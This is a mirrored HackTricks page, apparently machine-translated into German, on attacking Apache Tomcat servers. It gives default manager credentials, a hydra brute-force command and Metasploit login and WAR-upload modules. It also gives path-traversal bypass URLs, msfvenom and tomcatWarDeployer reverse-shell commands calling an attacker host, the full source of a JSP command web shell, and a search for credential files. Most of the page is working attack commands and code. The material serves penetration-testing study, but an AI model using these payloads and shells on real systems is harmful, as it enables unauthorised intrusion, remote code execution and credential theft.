mirror of https://github.com/carlospolop/hacktricks synced 2024-12-18 09:03:30 +00:00

History

Translator 49172f6aed Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2		2024-05-05 22:18:38 +00:00
..
basic-tomcat-info.md	Translated ['forensics/basic-forensic-methodology/partitions-file-system	2024-03-26 15:48:11 +00:00
README.md	Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2	2024-05-05 22:18:38 +00:00

README.md

Tomcat

Erlernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Arbeiten Sie in einem Cybersicherheitsunternehmen? Möchten Sie Ihr Unternehmen in HackTricks beworben sehen? Oder möchten Sie Zugriff auf die neueste Version des PEASS oder HackTricks als PDF herunterladen? Überprüfen Sie die ABONNEMENTPLÄNE!
Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
Holen Sie sich das offizielle PEASS & HackTricks-Merch
Treten Sie der 💬 Discord-Gruppe bei oder der Telegram-Gruppe oder folgen Sie mir auf Twitter 🐦@carlospolopm.
Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an das hacktricks-Repo und das hacktricks-cloud-Repo einreichen.

Try Hard Security Group

{% embed url="https://discord.gg/tryhardsecurity" %}

Entdeckung

Normalerweise läuft es auf Port 8080
Gemeinsamer Tomcat-Fehler:

Enumeration

Versionsidentifizierung

Um die Version von Apache Tomcat zu finden, kann ein einfacher Befehl ausgeführt werden:

curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat

Manager-Dateispeicherort

Die genauen Speicherorte der /manager- und /host-manager-Verzeichnisse zu identifizieren ist entscheidend, da ihre Namen verändert sein könnten. Es wird empfohlen, eine Brute-Force-Suche durchzuführen, um diese Seiten zu lokalisieren.

Benutzername Aufzählung

Für Tomcat-Versionen älter als 6 ist es möglich, Benutzernamen durch zu enumerieren:

msf> use auxiliary/scanner/http/tomcat_enum

Standardanmeldeinformationen

Das Verzeichnis /manager/html ist besonders sensibel, da es das Hochladen und Bereitstellen von WAR-Dateien ermöglicht, was zu Codeausführung führen kann. Dieses Verzeichnis ist durch eine grundlegende HTTP-Authentifizierung geschützt, wobei häufig verwendete Anmeldeinformationen sind:

admin:admin
tomcat:tomcat
admin:
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat

Diese Anmeldeinformationen können mit dem folgenden Befehl getestet werden:

msf> use auxiliary/scanner/http/tomcat_mgr_login

Eine weitere bemerkenswerte Verzeichnis ist /manager/status, das die Tomcat- und Betriebssystemversion anzeigt und bei der Identifizierung von Schwachstellen hilft.

Brute-Force-Angriff

Um einen Brute-Force-Angriff auf das Manager-Verzeichnis zu versuchen, kann man Folgendes verwenden:

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html

Zusätzlich zur Festlegung verschiedener Parameter in Metasploit, um ein bestimmtes Zielhost anzugreifen.

Häufige Schwachstellen

Passwort-Backtrace-Enthüllung

Der Zugriff auf /auth.jsp kann unter glücklichen Umständen das Passwort in einem Backtrace offenlegen.

Doppelte URL-Codierung

Die CVE-2007-1860-Schwachstelle in mod_jk ermöglicht doppelte URL-Codierungspfadtraversierung, die unbefugten Zugriff auf die Management-Schnittstelle über eine speziell erstellte URL ermöglicht.

Um auf das Management-Web von Tomcat zuzugreifen, gehen Sie zu: pathTomcat/%252E%252E/manager/html

/Beispiele

Apache Tomcat-Versionen 4.x bis 7.x enthalten Beispielskripte, die anfällig für Informationslecks und Cross-Site-Scripting (XSS)-Angriffe sind. Diese umfassend aufgelisteten Skripte sollten auf unbefugten Zugriff und potenzielle Ausnutzung überprüft werden. Weitere Informationen finden Sie hier

/examples/jsp/num/numguess.jsp
/examples/jsp/dates/date.jsp
/examples/jsp/snp/snoop.jsp
/examples/jsp/error/error.html
/examples/jsp/sessions/carts.html
/examples/jsp/checkbox/check.html
/examples/jsp/colors/colors.html
/examples/jsp/cal/login.html
/examples/jsp/include/include.jsp
/examples/jsp/forward/forward.jsp
/examples/jsp/plugin/plugin.jsp
/examples/jsp/jsptoserv/jsptoservlet.jsp
/examples/jsp/simpletag/foo.jsp
/examples/jsp/mail/sendmail.jsp
/examples/servlet/HelloWorldExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestParamExample
/examples/servlet/CookieExample
/examples/servlet/JndiServlet
/examples/servlet/SessionExample
/tomcat-docs/appdev/sample/web/hello.jsp

Pfadtraversierungs-Exploit

In einigen anfälligen Konfigurationen von Tomcat können Sie über den Pfad /..;/ auf geschützte Verzeichnisse in Tomcat zugreifen.

So könnten Sie beispielsweise möglicherweise auf die Tomcat-Manager-Seite zugreifen, indem Sie auf Folgendes zugreifen: www.vulnerable.com/lalala/..;/manager/html

Ein weiterer Weg, um geschützte Pfade mit diesem Trick zu umgehen, besteht darin, auf http://www.vulnerable.com/;param=value/manager/html zuzugreifen

RCE

Schließlich können Sie, wenn Sie Zugriff auf den Tomcat Web Application Manager haben, eine .war-Datei hochladen und bereitstellen (Code ausführen).

Einschränkungen

Sie können nur ein WAR bereitstellen, wenn Sie über ausreichende Berechtigungen verfügen (Rollen: admin, manager und manager-script). Diese Details finden Sie normalerweise in der Datei tomcat-users.xml, die in der Regel unter /usr/share/tomcat9/etc/tomcat-users.xml definiert ist (es variiert je nach Version) (siehe POST Abschnitt).

# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed

# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"

# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"

Metasploit

Metasploit ist ein beliebtes Framework für die Entwicklung, Test und Ausführung von Exploits gegen eine Zielmaschine. Es bietet eine Vielzahl von Tools, die bei der Pentest-Phase verwendet werden können, um Schwachstellen in einem System zu identifizieren und auszunutzen.

use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

MSFVenom Reverse Shell

Erstellen Sie den Krieg zur Bereitstellung:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war

Lade die Datei revshell.war hoch und greife darauf zu (/revshell/):

Bind- und Reverse-Shell mit tomcatWarDeployer.py

In einigen Szenarien funktioniert dies nicht (zum Beispiel bei alten Versionen von Sun)

Download

git clone https://github.com/mgeeky/tomcatWarDeployer.git

Umgekehrte Shell

./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/

Bind-Shell

./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/

Mit Culsterd verwenden

clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows

Manuelle Methode - Web-Shell

Erstellen Sie index.jsp mit diesem Inhalt:

<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
}  catch(IOException e) {   e.printStackTrace();   }
}
%>
<pre><%=output %></pre>

mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it

Manuelle Methode 2

Holen Sie sich eine JSP-Webshell wie diese und erstellen Sie eine WAR-Datei:

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp

POST

Der Name der Tomcat-Anmeldeinformationen-Datei lautet tomcat-users.xml

find / -name tomcat-users.xml 2>/dev/null

Andere Möglichkeiten, Tomcat-Anmeldeinformationen zu sammeln:

msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat

Andere Tomcat-Scanning-Tools

https://github.com/p0dalirius/ApacheTomcatScanner

Referenzen

Try Hard Security Group

{% embed url="https://discord.gg/tryhardsecurity" %}

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Arbeiten Sie in einem Cybersicherheitsunternehmen? Möchten Sie Ihr Unternehmen in HackTricks beworben sehen? Oder möchten Sie Zugriff auf die neueste Version des PEASS erhalten oder HackTricks im PDF-Format herunterladen? Überprüfen Sie die ABONNEMENTPLÄNE!
Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
Holen Sie sich das offizielle PEASS & HackTricks-Merch
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie mir auf Twitter 🐦@carlospolopm.
Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an das HackTricks-Repository und das HackTricks-Cloud-Repository senden.